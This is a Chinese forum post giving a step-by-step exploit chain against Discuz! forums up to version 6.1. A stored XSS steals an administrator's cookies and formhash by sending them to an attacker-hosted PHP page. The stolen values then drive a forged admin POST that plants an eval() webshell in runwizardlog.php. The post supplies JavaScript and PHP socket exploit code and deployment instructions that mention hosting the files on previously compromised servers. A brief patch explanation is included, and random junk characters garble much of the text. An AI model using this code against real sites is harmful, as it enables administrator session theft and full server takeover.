Discuz XSS得webshell! P1 D: A' w3 _( m2 E7 S
By racle @tian6.com
7 R* S Z3 y4 f, E% x! Q: Q4 l6 m( t欢迎转帖.但请保留版权信息. V0 N8 o8 G# f6 s
受影响版本 iscuz<=6.1.0,gbk+utf+big5% B0 U9 D% N( |1 N9 r+ U
5 q8 O# D; a& a, R, q* x0 \- T, C' X新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.7 r' x3 w$ j/ M1 S
6 g4 y! y7 a w1 W7 Z& R, |
3 }: c4 ^; C* x+ C3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=87069 w' s& L- R: f0 v9 N. C
当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
! m/ A( v& J* d9 d/ u: Y
* O3 R H3 U+ G# @! q4 _分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..+ } e* d6 _+ D6 W
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
0 _& u5 m- U8 Z; \2 H8 @$ T' U% Y# b/ V$ h2 k
; Y' d5 d4 {- t5 @( B, K
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------1 x7 b! L4 g8 Y" R* d! Q
9 s) g& o {% u! T& }* w2 u1 }
- {8 P5 d: E- d- V- h
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
# G0 A+ _" ^: b9 C! [4 t
" M. V9 n8 v$ B9 m% K) Oproblem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.: V+ w& b% I7 v, j# @
& k& o0 M( d; q" [problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.5 \! d' N# ]8 e: R9 s+ O: X
6 n) a+ }* V, ]& X: d
r5 ^1 w( u: ~1 `7 b7 q, E$ M) k下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
9 y y: f, ~' k: v* Z- D
3 \( T' v2 }% v4 d6 k7 G5 f global $runwizardfile, $runwizardhistory;! O( u. _9 U5 Y. P
' n8 `1 B+ y$ Z9 h# F $fp = fopen($runwizardfile, 'w');' D. o1 |8 ?$ F. P
4 @: s9 x) I; j& H6 F# L; O
fwrite($fp, serialize($runwizardhistory));
& {4 I" S$ t4 d: Y: C
6 E+ ?& F D) w8 R1 h fclose($fp);
D$ Z% T+ r. v
! K9 x- M7 O+ [ E}
; S! l& c3 e8 I R3 z: H复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
$ b* J9 p) d& P7 }. }0 F( J以下是修补的办法:function saverunwizardhistory() {
v% U. M# B. m$ m1 A* c/ | Q. S% y# x2 g
global $runwizardfile, $runwizardhistory;! Q4 f9 X4 q* I# V7 L
( H/ F' U- G: o L+ W9 ? $fp = fopen($runwizardfile, 'w'); Z1 ?2 D3 T4 C9 Y: x
3 |3 b! j/ P4 S( n
$s = '<?php exit;?>';
: u/ b% Z$ H- ?& `- K$ Y- H: o+ Q; r4 F0 I( `: S' C1 D
$s .= serialize($runwizardhistory);2 \0 z0 G# \, U: B3 [5 Z% j2 u, W
+ k9 Y- B) H1 o; m$ q, S& Y d
fwrite($fp, $s);
9 g5 T4 ^/ e& s4 p; }/ U" A$ J% C7 m" t
fclose($fp);# ~% T6 t5 ^- e n5 p3 [! M
5 g; T7 [3 d5 e5 R O- s+ _! S) i/ Y
}) o* v% d: @' U4 l \
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
" W. K& C S# }% |; Z( R2 G9 o3 D S8 |, C. e$ D3 y
% o- w' J% b: x# s! T W
6 R' d; I7 N$ ^" V! @
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
& B. Z( R4 m! |* F4 p' C. }+ ~3 O$ Z2 B4 k2 T- O5 M/ Z X
- t2 b! Y) k+ u( { 以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
! d" K5 B& j6 q; Q `' ~ Z1 e3 e- J. j- N! U- ^ T! i! U- j
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.; `- o$ M) D6 i" ~* }8 N
; z5 ~/ V3 x- j! Z/ ~- [" E
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.! m7 |! t+ t) N: q
# c2 \5 f8 _8 C首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:- Z+ _6 ~. f6 O' N, w' U. R
4 G- _$ W! Y6 b, T+ C7 G: Q' F
var url="http://目标网站/admincp.php"; . w2 ~, U n; b5 m
5 x# _$ C- w+ _- j: a9 S: E& F1 v
/*获得cookies*/
9 F( I% D9 l$ s# k( A
) M. J/ D# P' l4 P+ u9 Pfunction getURL(s) {4 v( \, l1 p; v$ s- }) p
6 r4 O. E; G/ ?& s
var image = new Image();
+ ~7 U3 u% l8 ^$ v. _1 U" m+ o0 S6 C+ t% T7 k. l: _# a" M
image.style.width = 0;7 R% H) f _1 H* D- F+ f
- l+ f6 h5 w, P2 ?) Rimage.style.height = 0;3 u8 C$ a" D* T$ k4 g: k1 [$ ~
: S4 `2 |/ c; {3 E9 h
image.src = s;0 [+ B( i4 U0 |5 H @
6 z+ r5 y, U7 A K: v. H
}
* J" D9 l# Q9 G0 b; X! Q: ]# B* n: P/ w) C+ [+ l' c% x
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php" ?0 w7 O" |) ~. [4 Q
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];; n) W" b4 o# L4 L% e" q& U$ [; [
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵)  y0 U# f3 x; }: i, A* [$ L, U
( C; K' J/ y9 |4 N& }# I- s% o/ {; g! ?4 l
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
# ~5 Q+ G3 Z& [
$ ?4 }. y/ P& I }/ P+ n7 ]! x; _" ?( [9 ~, y( U3 b0 U
8 q" [, X. G" H1 m x7 p9 B
/*hash*/
3 Y: q3 r$ Z! R6 @$ {
* \5 P% E- f9 X7 V- M2 }% q, qvar xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");3 v, x- H8 Z4 a w2 H- e
2 T4 J4 }0 {) J& RxmlHttpReq.open("GET", url+"admincp.php?action=home", false);
/ ^2 [* ]9 O7 v3 R3 V& v
- r; i4 r2 x" _6 E9 ?xmlHttpReq.send();1 k: r7 W/ e. N: U! x, m: r& K* R0 q
* B6 }6 f9 v. a V" W, xvar resource = xmlHttpReq.responseText;
! d/ Y' K: @8 G: X9 ^7 T* }: H& \: ]( J+ q1 s
var numero = resource.search(/formhash/);
" L4 b6 U. \2 o( [% ?! g/ E4 {9 L* l' f
var formhash=encodeURIComponent(resource.substr(numero+17,8));
4 s2 i8 p- V# S8 X
, ^5 g6 w: L/ @) `$ i
1 Y2 _& O! z1 G3 M% y0 |% m d& t, G# Q) L
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据 % n3 s2 |/ m `* `- {% k
" \$ M) v/ Q& c5 c
xmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 - U$ n; W3 N0 y. V! F! b; A+ k
; Q6 u4 A" n1 u
xmlHttpReq.setRequestHeader("Referer", url);
% E7 ~' P Z- C5 m
1 ?+ O1 Q$ w6 d! o! }6 BxmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
) W2 X) ~, o8 i! X) a4 l8 w" w2 c
$ ~# w: c5 c/ B$ B$ k* r3 IxmlHttpReq.setrequestheader("content-length",post.length);
) `. T' X' p9 S+ K; A1 {7 s# M/ m! R9 v- { C( o* b$ Z4 u
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); - F8 R5 d! _9 N. U8 o
: G! d h9 w" y& L' q& e
xmlHttpReq.send(post);//发送数据( d3 Y3 N! M- X6 l
复制代码这里HASH我假设正确,这样提交,也无须cookies; j. t$ [2 r8 T
' {% S: Q! w% [' P
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
7 V9 R' F9 h& l) j+ q0 s; b5 t+ U* G I6 ~$ g
if (!$sock) die("$errstr ($errno)\n");
9 m: L3 W, D5 _+ h, X( g7 [
. C5 H. z. F( }, u1 V! {6 D$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5'; r' X" U0 \+ ~- P
# i+ Z5 e* \8 a; E8 x' S/ P2 ~9 H( ^
2 M9 [" k. } y0 i2 T k. |fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
5 a$ v' A) G4 E5 r- i% ?* k @$ r; p4 @
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");! T& z$ H4 o% `$ k& C4 h* M
) Z' t6 m! R7 `; }( B5 F9 D5 o
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");8 y$ ? U8 Y0 f" t! d/ S0 L
5 u+ u' y" K0 l# E. y. w7 F' Y
fwrite($sock, "Accept-Language: zh-cn\r\n");5 ^+ X& m( r/ U7 Z
0 m- @- o: n" h
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");5 Q5 A. ^1 b+ T' G! U3 }% c
( G) }. s2 D& Kfwrite($sock, "Accept-Encoding: gzip, deflate\r\n");( M; S' W' V% n; j( X o6 F* f* y; D" Y
) [# N# ]$ w+ D+ B
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");" C6 B% z+ s! d" v" Q5 p# x
4 P/ v6 G' X. v+ H
fwrite($sock, "Host: $url\r\n");
/ w4 _5 @6 d4 ^2 v! s" D
( r" C/ v6 \$ X( |3 kfwrite($sock, "Content-Length: ".strlen($data)."\r\n");) @' l3 O7 [9 p8 _. Z3 }+ P
, L5 [$ U W( _
fwrite($sock, "Connection: Keep-Alive\r\n");
- o. h# G2 A4 ]8 y4 p; U
8 i' }) h7 }& x s/ _ p- Ifwrite($sock, "Cache-Control: no-cache\r\n");
9 N0 r# v$ l5 L- t! z
# Y. c3 }1 G2 M( {5 I, @+ Ofwrite($sock, "Cookie:".$cookies."\r\n\r\n");% o5 z- A% T6 t8 n: s5 f
# \8 T6 i# I. I$ [
fwrite($sock, $data);+ j! z. {1 B, y5 ^( ?4 ]
1 O/ A+ S$ ^0 H# v5 c
! f6 J3 p. H w1 U# ]" H& X4 Q; b
3 ^8 g9 I5 _* _0 U$headers = "";' }" U& @( U" _# y
- {% B1 S7 c A/ c6 t4 w3 Z. s2 owhile ($str = trim(fgets($sock, 4096))), i' @7 q% ~! C9 s
# d# u" _( a1 \: Z, q* V: ?' _
$headers .= "$str\n";
* x! M' _0 B$ U8 t+ Q4 v
6 b( r- i9 R- M$ ]9 \+ i) ~# Necho "\n";
& Z4 @2 m0 y5 H8 D: J M; k
3 l5 X1 L3 z0 L$body = "";
/ Y1 B: G" a8 T
2 X" m0 W9 p, S6 {- @9 Kwhile (!feof($sock))
) Z+ r& Q0 m; u+ a
( L$ a* {& Q, ^7 Q5 a2 D: h* k $body .= fgets($sock, 4096);) K+ U! t& p( h+ ]4 m7 U
+ o9 D& _6 E, m9 f7 n
fclose($sock);1 ?0 ^" x# a8 ^& ^7 }- v, {4 h, c
. ~4 [ O+ W0 b. {7 W, G
echo $body;! a* P2 g) W7 b" K( W- Q x
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^6 K, Z5 P# N6 Y
) S# W: w2 K) d7 F. Y
$ l9 _8 f! I+ b
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
2 R7 e% z/ g1 ~8 _* r" S& G$ O2 ~ v% S$ O9 o: D0 x
% r( [5 U/ G, N$ T9 n
1 HP SOCKET利用方法首先打开racle.js
4 p1 A, o6 Q: O- X% I
$ U1 ]3 S. [% e& X5 B- `/ Dvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
9 Y; ]+ l9 A0 h4 A
$ [! Y" d$ C O2 H
7 E% n$ {- n; @; g: K
' f% n% X- b& o. [1 f- ^& w8 u3 c% P然后打开racle@tian6.php. s! C4 Q7 I7 a& D& U7 }1 b% O9 P! D
' M/ G1 |, ]. r, i7 h% a+ d$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com n. k9 H2 y; q) B% M. d
0 b. Q% K6 g L% c' M
4 z8 M* }3 N& I# N3 Q( t
# C% L0 {2 `/ P) V+ O& i如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
" H" m) Z" S- M( g. D) B# S9 M" R
0 u$ ^: [: @' H+ {- h- PgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));( y! \# C& Q- ^
( H' D: B3 }1 b! l
为
6 z4 H9 X! \" W( ~8 I: j8 R
! m* j# ?. _4 M, ?" |: w# u3 S, F; rgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
2 ?" _4 e9 Z& y- ^9 o复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
! v+ K/ Q+ G, k; ?2 u' t- O; |* R' Q6 P% i+ P/ C
5 ~+ }# |6 C' h, B1 C- `4 N
3 M8 ^. V s2 b8 R7 Q) C
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:% P- o; A. c6 T0 u5 {9 E
* e8 e/ h3 s1 T+ a+ \
var formhash=encodeURIComponent(resource.substr(numero+17,8));
: P/ f/ P; b: _' j% b3 K
4 O4 v9 v! j$ m: d; R+ I+ {$ C为
9 G" _0 b2 ^4 A% `; o! ]- ]" Z
3 j. T7 Z3 z, }( @3 {# [/ @var formhash=encodeURIComponent(resource.substr(numero+9,8));6 O5 F! U) E+ E6 m; q+ n4 a$ J
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.5 c! M* Q2 C. y8 `! t3 D
5 \' d5 r: d2 S9 [& @; [如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.; r0 i% O4 ^& O, Y% U2 h
9 ^5 h6 z2 P' g' w9 V1 t2 d8 ]如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.+ O/ I+ b2 [) B+ Z/ S$ J2 g
/ B Q2 c7 i3 N9 \
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.0 h- A0 Y M2 m. n
/ Y5 a+ I, o5 m2 o
|
发表于 2012-9-13 17:11:49
收藏
支持
反对